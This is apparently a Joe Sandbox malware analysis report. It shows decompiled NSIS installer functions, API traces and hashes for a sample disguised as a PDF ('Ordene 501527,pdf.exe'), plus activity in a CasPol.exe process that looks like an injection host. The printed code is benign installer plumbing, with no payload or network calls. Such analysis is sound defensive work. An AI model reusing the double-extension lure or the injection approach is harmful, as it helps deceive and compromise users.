			E00402E5D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x7976d8; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x7a8a30;
						if(_t2 >  *0x7a8a30) {
							_t3 = CreateDialogParamW( *0x7a8a20, 0x6f, 0, E00402DD7, 0);
							 *0x7976d8 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406675(0);
					}
				} else {
					_t6 =  *0x7976d8; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x7976d8 = 0;
					return _t6;
				}
			}

0x00402e64
0x00402e7e
0x00402e84
0x00402e8e
0x00402e94
0x00402e9a
0x00402eab
0x00402eb4
0x00000000
0x00402eb9
0x00402ec0
0x00402e86
0x00402e8d
0x00402e8d
0x00402e66
0x00402e66
0x00402e6d
0x00402e70
0x00402e70
0x00402e76
0x00402e7d
0x00402e7d

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405C38(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040625F(0x7a4728, _a4);
				_t21 = E00405BDB(0x7a4728);
				if(_t21 != 0) {
					E004064F3(_t21);
					if(( *0x7a8a3c & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4728 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4728);
							_push(0x7a4728);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004065A2();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405B7C(0x7a4728);
								continue;
							} else {
								goto L1;
							}
						}
						E00405B30();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405c44
0x00405c4f
0x00405c53
0x00405c5a
0x00405c66
0x00405c76
0x00405c78
0x00405c90
0x00405c91
0x00405c98
0x00405c99
0x00000000
0x00000000
0x00405c7c
0x00405c83
0x00405c8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c83
0x00405c9b
0x00000000
0x00405caf
0x00405c68
0x00405c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405c6e
0x00405c55
0x00000000

APIs

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,?,75173420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75173420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,?,75173420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75173420,00000000), ref: 00405C91
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,C:\Users\user\AppData\Local\Temp\nsd84B6.tmp,?,?,75173420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75173420), ref: 00405CA1

Strings

C:\Users\user\AppData\Local\Temp\nsd84B6.tmp, xrefs: 00405C3E, 00405C43, 00405C49, 00405C8A, 00405C90, 00405C98, 00405CA0

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsd84B6.tmp
API String ID: 3248276644-498781119
Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040612D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040612D(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004060CC(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x0040613b
0x0040613d
0x00406155
0x0040615a
0x0040615f
0x0040619d
0x0040619d
0x00406161
0x00406173
0x0040617e
0x00406184
0x0040618f
0x00000000
0x00000000
0x0040618f
0x004061a3

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,007A0F00,00000000,?,?,Call,?,?,004063A1,80000002), ref: 00406173
RegCloseKey.ADVAPI32(?,?,004063A1,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,007A0F00), ref: 0040617E

Strings

Call, xrefs: 00406134

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405844 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405844(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x7a4f28->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f28,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x0040584d
0x0040586d
0x00405875
0x0040587a
0x00000000
0x00405880
0x00405884

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
CloseHandle.KERNEL32(?), ref: 0040587A

Strings

Error launching installer, xrefs: 00405857

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78

Uniqueness

Uniqueness Score: -1.00%

Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004038D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x79fee4; // 0x96adf8
				_t3 = E004038BD(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x79fee4 =  *0x79fee4 & 0x00000000;
				return _t3;
			}

0x004038d9
0x004038e1
0x004038e8
0x004038eb
0x004038eb
0x004038ed
0x004038f2
0x004038f9
0x004038ff
0x00403903
0x00403904
0x0040390c

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75173420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
GlobalFree.KERNEL32(0096ADF8), ref: 004038F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405B7C(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405b7d
0x00405b87
0x00405b8a
0x00405b90
0x00405b91
0x00405b92
0x00405b9a
0x00000000
0x00000000
0x00000000
0x00405b9a
0x00405b9c
0x00405ba4

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ordene 501527,pdf.exe,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ordene 501527,pdf.exe,C:\Users\user\Desktop\Ordene 501527,pdf.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92

Strings

C:\Users\user\Desktop, xrefs: 00405B7C

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-3370423016
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC

Uniqueness

Uniqueness Score: -1.00%

Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CB6(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405cc6
0x00405cc8
0x00405ccb
0x00405cf7
0x00405cd0
0x00405cd9
0x00405cde
0x00405ce9
0x00405cec
0x00405d08
0x00405cee
0x00405cf5
0x00000000
0x00405cf5
0x00405d01
0x00405d05
0x00405d05
0x00405cff
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8

Memory Dump Source

Source File: 00000001.00000002.39984383678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.39984339455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984466709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39984513058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986617669.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986676251.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986724117.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986768717.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986937358.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39986986996.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987038715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987104300.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.39987555179.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Ordene 501527,pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 4428, Parent PID: 4496COMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	98.3%
Signature Coverage:	0%
Total number of Nodes:	234
Total number of Limit Nodes:	21

Executed Functions

Function 01312168 Relevance: 1.7, APIs: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 01312171

Memory Dump Source

Source File: 00000009.00000002.44497900987.0000000001300000.00000040.00000400.00020000.00000000.sdmp, Offset: 01300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1300000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 51e57bf99ea36f12ba555d4785ad1903a1a12e7d819be73479862e16834165ed
Instruction ID: c6efff73a0d7f1a9da872a01f6ca774004b8820929d7e31a5ca0f6e43e5c0b85
Opcode Fuzzy Hash: 51e57bf99ea36f12ba555d4785ad1903a1a12e7d819be73479862e16834165ed
Instruction Fuzzy Hash: 50515C3520878787DB229E78C8D53CA7BA5AF22364F2843ADCCE98B0D6D3318506C746

Uniqueness

Uniqueness Score: -1.00%

Function 1D7B9F18 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.44516256817.000000001D7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1d7b0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1387bc926fb65ba324721d871515f34d1858054c8981c1d1cfc44b72280438b0
Instruction ID: b44e428b7b7cc61132b136ba404d2333d19d9fbe670690a61133b345d265bcec
Opcode Fuzzy Hash: 1387bc926fb65ba324721d871515f34d1858054c8981c1d1cfc44b72280438b0
Instruction Fuzzy Hash: 8CB16470E002098FDB04EFA4D8857DEBBF2BF88725F14C52AD855E7294EB759845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 208C7328 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 208C73B6
GetCurrentThread.KERNEL32 ref: 208C73F3
GetCurrentProcess.KERNEL32 ref: 208C7430
GetCurrentThreadId.KERNEL32 ref: 208C7489

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 73866350adea2c55e1f8d877e72421f26602d67bc04bc5637ad2d121b557a85d
Instruction ID: dcf0ccd4e3dda7e09b8eae9e2852ccb84e34f6a7fdc93ee22596697b87af4510
Opcode Fuzzy Hash: 73866350adea2c55e1f8d877e72421f26602d67bc04bc5637ad2d121b557a85d
Instruction Fuzzy Hash: B951A7B0900249CFDB18CFA9D588BAEBBF1EF48310F248059E509A7351D775A948CB66

Uniqueness

Uniqueness Score: -1.00%

Function 208C7338 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 208C73B6
GetCurrentThread.KERNEL32 ref: 208C73F3
GetCurrentProcess.KERNEL32 ref: 208C7430
GetCurrentThreadId.KERNEL32 ref: 208C7489

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_208c0000_CasPol.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 68457559578d2149124ccae9f4e1cca6279d5f2a6ce3d09a4028164fff41b7b1
Instruction ID: a42c6a582dff19fefff26caa61c49559a3f2ff0541d8ba9a172361b8603bfac9
Opcode Fuzzy Hash: 68457559578d2149124ccae9f4e1cca6279d5f2a6ce3d09a4028164fff41b7b1
Instruction Fuzzy Hash: B25196B0D00249CFDB18CFA9D588BAEBBF1EF88310F248419D409A7350DB75A948CF66

Uniqueness

Uniqueness Score: -1.00%

Function 208CB867 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowW.USER32(00000000,00000000), ref: 208CD606

Strings

d, xrefs: 208CB870

Memory Dump Source

Source File: 00000009.00000002.44529021162.00000000208C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 208C0000, based on PE: false

Joe Sandbox IDA Plugin

